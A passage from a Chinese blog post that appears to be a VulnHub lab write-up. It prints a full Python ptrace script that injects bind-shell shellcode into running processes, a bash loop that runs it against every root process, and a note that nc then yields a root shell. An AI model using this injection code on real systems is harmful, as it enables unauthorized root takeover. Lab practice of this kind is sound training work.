        <span class="token punctuation">(</span><span class="token string">"ds"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"es"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"fs"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"gs"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token punctuation">]</span>

libc <span class="token operator">=</span> ctypes<span class="token punctuation">.</span>CDLL<span class="token punctuation">(</span><span class="token string">"libc.so.6"</span><span class="token punctuation">)</span>

pid<span class="token operator">=</span>int<span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

<span class="token comment" spellcheck="true"># Define argument type and respone type.</span>
libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">.</span>argtypes <span class="token operator">=</span> <span class="token punctuation">[</span>ctypes<span class="token punctuation">.</span>c_uint64<span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_uint64<span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_void_p<span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_void_p<span class="token punctuation">]</span>
libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">.</span>restype <span class="token operator">=</span> ctypes<span class="token punctuation">.</span>c_uint64

<span class="token comment" spellcheck="true"># Attach to the process</span>
libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">(</span>PTRACE_ATTACH<span class="token punctuation">,</span> pid<span class="token punctuation">,</span> None<span class="token punctuation">,</span> None<span class="token punctuation">)</span>
registers<span class="token operator">=</span>user_regs_struct<span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token comment" spellcheck="true"># Retrieve the value stored in registers</span>
libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">(</span>PTRACE_GETREGS<span class="token punctuation">,</span> pid<span class="token punctuation">,</span> None<span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>byref<span class="token punctuation">(</span>registers<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Instruction Pointer: "</span> <span class="token operator">+</span> hex<span class="token punctuation">(</span>registers<span class="token punctuation">.</span>rip<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Injecting Shellcode at: "</span> <span class="token operator">+</span> hex<span class="token punctuation">(</span>registers<span class="token punctuation">.</span>rip<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment" spellcheck="true"># Shell code copied from exploit db.</span>
shellcode<span class="token operator">=</span><span class="token string">"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"</span>

<span class="token comment" spellcheck="true"># Inject the shellcode into the running process byte by byte.</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> xrange<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span>len<span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">:</span>

  <span class="token comment" spellcheck="true"># Convert the byte to little endian.</span>
  shellcode_byte_int<span class="token operator">=</span>int<span class="token punctuation">(</span>shellcode<span class="token punctuation">[</span>i<span class="token punctuation">:</span><span class="token number">4</span><span class="token operator">+</span>i<span class="token punctuation">]</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'hex'</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span>
  shellcode_byte_little_endian<span class="token operator">=</span>struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">"&lt;I"</span><span class="token punctuation">,</span> shellcode_byte_int<span class="token punctuation">)</span><span class="token punctuation">.</span>rstrip<span class="token punctuation">(</span><span class="token string">'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'hex'</span><span class="token punctuation">)</span>
  shellcode_byte<span class="token operator">=</span>int<span class="token punctuation">(</span>shellcode_byte_little_endian<span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span>

  <span class="token comment" spellcheck="true"># Inject the byte.</span>
  libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">(</span>PTRACE_POKETEXT<span class="token punctuation">,</span> pid<span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_void_p<span class="token punctuation">(</span>registers<span class="token punctuation">.</span>rip<span class="token operator">+</span>i<span class="token punctuation">)</span><span class="token punctuation">,</span>shellcode_byte<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Shellcode Injected!!"</span><span class="token punctuation">)</span>

<span class="token comment" spellcheck="true"># Modify the instuction pointer</span>
registers<span class="token punctuation">.</span>rip<span class="token operator">=</span>registers<span class="token punctuation">.</span>rip<span class="token operator">+</span><span class="token number">2</span>

<span class="token comment" spellcheck="true"># Set the registers</span>
libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">(</span>PTRACE_SETREGS<span class="token punctuation">,</span> pid<span class="token punctuation">,</span> None<span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>byref<span class="token punctuation">(</span>registers<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Final Instruction Pointer: "</span> <span class="token operator">+</span> hex<span class="token punctuation">(</span>registers<span class="token punctuation">.</span>rip<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment" spellcheck="true"># Detach from the process.</span>
libc<span class="token punctuation">.</span>ptrace<span class="token punctuation">(</span>PTRACE_DETACH<span class="token punctuation">,</span> pid<span class="token punctuation">,</span> None<span class="token punctuation">,</span> None<span class="token punctuation">)</span>
</code></pre>
<p>但是不是每一个进程都能成功的，所以利用：</p>
<pre class=" language-bash"><code class="language-bash"><span class="token keyword">for</span> i <span class="token keyword">in</span> `ps -ef<span class="token operator">|</span><span class="token function">grep</span> root<span class="token operator">|</span><span class="token function">grep</span> -v <span class="token string">"grep"</span><span class="token operator">|</span><span class="token function">awk</span> <span class="token string">'{print <span class="token variable">$2</span>}'</span>`<span class="token punctuation">;</span> <span class="token keyword">do</span> python2.7 inject.py <span class="token variable">$i</span><span class="token punctuation">;</span> <span class="token keyword">done</span>
</code></pre>
<p>循环跑，就是环境可能会出问题吧</p>
<p>然后用nc连接即可返回root权限账号</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231016202934-53kgzbh.png" alt="image">​</p>
<p>‍</p>
<!-- flag of hidden posts -->
  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
          <li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#vulnhub7"><span class="toc-number">1.</span> <span class="toc-text">vulnhub7</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getshell"><span class="toc-number">1.2.</span> <span class="toc-text">getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">1.3.</span> <span class="toc-text">权限提升</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/10/16/vulnhub7/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/10/16/vulnhub7/&text=vulnhub7"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/10/16/vulnhub7/&is_video=false&description=vulnhub7"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=vulnhub7&body=Check out this article: https://qingfeng.tech/2023/10/16/vulnhub7/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/10/16/vulnhub7/&name=vulnhub7&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/10/16/vulnhub7/&t=vulnhub7"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2025
    清风
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
      --><li><a href="/">首页</a></li><!--
    --><!--
      --><li><a href="/about/">关于</a></li><!--
    --><!--
      --><li><a href="/archives/">归档</a></li><!--
    --><!--
      --><li><a href="/categories/">分类</a></li><!--
    --><!--
      --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
    --><!--
      --><li><a href="/search/">搜索</a></li><!--
    -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  
</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'qing3feng/qingfengComments';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</body>
</html>
